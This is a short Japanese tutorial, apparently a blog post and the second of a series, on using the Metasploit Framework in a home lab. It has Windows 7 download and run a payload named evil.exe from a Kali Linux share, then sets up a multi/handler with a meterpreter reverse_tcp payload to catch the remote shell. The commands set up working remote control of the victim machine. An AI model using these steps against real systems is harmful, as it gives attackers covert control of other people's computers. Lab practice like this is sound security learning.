Metasploit Flamework その2
前回ペイロード作成までしたので続き
Windows7でIEを起動
http://KaLiLinux のIPアドレス/share にアクセス
今回なら
http://192.168.1.134/share/
へアクセス
すると evil.exe が表示されている
これが確認できたら
KaliLinux でリバースシェルの準備
1 | msfconsole |
で
Metaploit を起動
msf コンソールが起動したら
1 | use exploit /multi/handler |
でハンドラーモジュールを使用
1 | set payload windows /meterpreter/reverse_tcp |
でペイロードをセット
1 | set LHOST 192.168.1.134 |
で KaliLInux のIPアドレスを設定
1 | show options |
で設定を確認
これで
1 | exploit |
でペイロードが実行され、待受状態になる
これで KaliLinux の準備ができたので
次に Windows でファイルをダウンロードし
Run を実行
すると Windows 側では何もおきていないように見えるけど
KaliLinux 側では
meterpreter セッションが確率されたことが
Terminal で表示される
なお Windows 側でも
1 | netstat -n | find "ESTABLISHED" |
を Command Prompt で実行することで確認できる
これでwindows の遠隔操作が可能になる
操作に使っているのは
Meterpreter なので
Windows7 の Command Prompt ではないので注意